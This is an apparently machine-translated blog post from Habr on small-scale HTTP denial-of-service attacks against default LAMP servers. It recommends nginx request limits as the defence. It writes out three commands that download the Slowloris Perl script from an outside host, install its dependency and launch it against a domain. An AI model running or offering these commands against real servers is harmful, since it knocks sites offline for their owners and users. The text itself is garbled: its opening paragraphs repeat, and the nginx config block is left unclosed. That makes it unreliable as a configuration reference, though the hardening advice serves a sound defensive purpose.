Children's HTTP DOS
Often, administrators set up LAMP out of the box. For home pages and test benches there is nothing to worry about.
Full DDOS is not the cheapest pleasure for an attacker, and if your portal has been ordered, then resources should be found to protect against the attack.
There is a greater danger in children's DOS, since anyone can conduct such an attack. Vulnerabilities are exposed to all popular Web servers in the original configuration with empty firewall rules and apply to corporate portals, dedicated servers, VPS - everything that is delivered but not configured. Mass hosting, as a rule, is not ill with children's diseases.
For Debian-like systems, these are 3 commands:
If you have not done so already, put nginx on the frontend. He not only works faster with files and speeds up the return of statics, but also has tremendous opportunities for the administrator, which Sysoev sometimes tells about in the mailing list.
The implementation of restrictions on the number of requests to dynamic pages from a single IP.
Allowed 10 requests per second from one IP with possible peaks up to 30 requests.
Young talents can test your life at the most inopportune moment. For example, when you are on vacation. Do not delay protection in the longbox.
Full DDOS is not the cheapest pleasure for an attacker, and if your portal has been ordered, then resources should be found to protect against the attack.
There is a greater danger in children's DOS, since anyone can conduct such an attack. Vulnerabilities are exposed to all popular Web servers in the original configuration with empty firewall rules and apply to corporate portals, dedicated servers, VPS - everything that is delivered but not configured. Mass hosting, as a rule, is not ill with children's diseases.
For Debian-like systems, these are 3 commands:
wget ha.ckers.org/slowloris/slowloris.pl
aptitude install libio-socket-ssl-perl
./slowloris.pl -dns domain.ruIf you have not done so already, put nginx on the frontend. He not only works faster with files and speeds up the return of statics, but also has tremendous opportunities for the administrator, which Sysoev sometimes tells about in the mailing list.
The implementation of restrictions on the number of requests to dynamic pages from a single IP.
Allowed 10 requests per second from one IP with possible peaks up to 30 requests.
limit_req_zone $binary_remote_addr zone=lphp:10m rate=10r/s;
location / {
limit_req zone=lphp burst=30 nodelay;Young talents can test your life at the most inopportune moment. For example, when you are on vacation. Do not delay protection in the longbox.
')
Source: https://habr.com/ru/post/125300/
All Articles